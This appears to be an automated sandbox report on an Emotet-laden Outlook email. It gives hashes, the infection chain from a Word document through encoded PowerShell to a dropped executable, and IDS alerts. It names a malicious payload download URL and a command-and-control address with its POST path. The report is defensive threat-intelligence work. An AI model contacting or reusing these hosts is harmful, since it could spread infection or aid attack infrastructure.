| Field | Value |
|---|---|
| File name | Administrator Notification_ Redirecting email with malware.msg |
| Full analysis | https://app.any.run/tasks/143bd81b-773a-437a-a3d2-95019312b9ef |
| Verdict | Malicious activity |
| Threats | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it has been upgraded into very destructive malware. It mostly targets corporate victims, but private users are also infected through mass spam email campaigns. |
| Analysis date | September 18, 2019, 16:12:31 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | |
| Indicators | |
| MIME | application/vnd.ms-outlook |
| File info | CDFV2 Microsoft Outlook Message |
| MD5 | 1980EF47AFBD461214935AFA653576B3 |
| SHA1 | D4A5F058452A6C04615245B5A70C09DA0464A189 |
| SHA256 | C1F7F8B62BD82CB682F69CFEB9F05E2404E3DE061D9CE06E2DBE586EC199E547 |
| SSDEEP | 12288:oNyxNRIIt1POT3XtwNJ6mdRXZ7NSU4VePg:oNyxNRIIt1POT3XtwNJ6mdVhHd |
| Extension | Type |
|---|---|
| .msg | Outlook Message (41.3) |
| .oft | Outlook Form Template (24.1) |
| .doc | Microsoft Word document (18.6) |
| .doc | Microsoft Word document (old ver.) (11) |
| PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 3424 | "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\Administrator Notification_ Redirecting email with malware.msg" | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | — | explorer.exe |
| User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Outlook; Version: 14.0.6025.1000 | | | | |
| 1440 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\VIF16270\Document_18092019 21267.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | OUTLOOK.EXE |
| User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Exit code: 0; Version: 14.0.6024.1000 | | | | |
| 2664 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE |
| User: admin; Company: Microsoft Corporation; Integrity Level: LOW; Description: Microsoft Word; Exit code: 0; Version: 14.0.6024.1000 | | | | |
| 2752 | powershell -encod [encoded command not shown] | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
| User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | | |
| 3940 | "C:\Users\admin\835.exe" | C:\Users\admin\835.exe | — | powershell.exe |
| User: admin; Integrity Level: MEDIUM; Exit code: 0 | | | | |
| 3312 | "C:\Users\admin\835.exe" | C:\Users\admin\835.exe | — | 835.exe |
| User: admin; Integrity Level: MEDIUM; Exit code: 0 | | | | |
| 3456 | --f0e46278 | C:\Users\admin\835.exe | — | 835.exe |
| User: admin; Integrity Level: MEDIUM; Exit code: 0 | | | | |
| 2364 | --f0e46278 | C:\Users\admin\835.exe | — | 835.exe |
| User: admin; Integrity Level: MEDIUM; Exit code: 0 | | | | |
| 3992 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | 835.exe |
| User: admin; Integrity Level: MEDIUM; Exit code: 0 | | | | |
| 3096 | "C:\Users\admin\AppData\Local\easywindow\easywindow.exe" | C:\Users\admin\AppData\Local\easywindow\easywindow.exe | — | easywindow.exe |
| User: admin; Integrity Level: MEDIUM; Exit code: 0 | | | | |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3424 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVR9AED.tmp.cvr | — | — | — |
| 3424 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\~DF031F711A5710E486.TMP | — | — | — |
| 3424 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\VIF16270\Document_18092019 21267 (2).doc:Zone.Identifier:$DATA | — | — | — |
| 1440 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR1CAF.tmp.cvr | — | — | — |
| 1440 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_2EBF2002-1694-45AA-95E5-2C6F688EFDAF.0\F6E4509.doc:Zone.Identifier:$DATA | — | — | — |
| 3424 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | pgc | 6D39279EA3CD5ED83257A3365C84286C | D13BA6EC69DF9B95F7CD4657B49863BC8A90D1C5FCFDD6B0AFCFA6E35ED9A230 |
| 3424 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\VIF16270\Re Invoices for University of Toronto Facilities.msg | msg | BEF2588E81052BCE054D119090A3A7EA | 871A5CC6732631BF6285803A0EE6D653534D087C190393B410DC5B1BFACD0A28 |
| 1440 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 3874C09F319C17BEA2E15B9310753595 | 095E3911376E4BE368DE99457F64E9A7F6B3741A66F6A0BAB24F3B8550FE8F57 |
| 3424 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_Calendar_2_E15AD21F8B3EA04EB23DF3A769BEC26F.dat | xml | B21ED3BD946332FF6EBC41A87776C6BB | B1AAC4E817CD10670B785EF8E5523C4A883F44138E50486987DC73054A46F6F4 |
| 3424 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_AvailabilityOptions_2_8099E0CD16D4B64191B558BC0DD9A3E1.dat | xml | EEAA832C12F20DE6AAAA9C7B77626E72 | C4C9A90F2C961D9EE79CF08FBEE647ED7DE0202288E876C7BAAD00F4CA29CA16 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3424 | OUTLOOK.EXE | GET | — | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | — | — | whitelisted |
2752 | powershell.exe | GET | 200 | 124.158.6.218:80 | http://thinhvuongmedia.com/wp-admin/n2keep7/ | VN | executable | 400 Kb | suspicious |
3796 | easywindow.exe | POST | 200 | 189.129.4.186:80 | http://189.129.4.186/enabled/vermont/ringin/merge/ | MX | binary | 132 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3424 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
2752 | powershell.exe | 124.158.6.218:80 | thinhvuongmedia.com | CMC Telecommunications Services Company | VN | suspicious |
3796 | easywindow.exe | 189.129.4.186:80 | — | Uninet S.A. de C.V. | MX | malicious |
| Domain | IP | Reputation |
|---|---|---|
| config.messenger.msn.com | | whitelisted |
| thinhvuongmedia.com | | suspicious |
PID | Process | Class | Message |
---|---|---|---|
2752 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2752 | powershell.exe | A Network Trojan was detected | AV INFO Suspicious EXE download from WordPress folder |
2752 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2752 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3796 | easywindow.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
3796 | easywindow.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |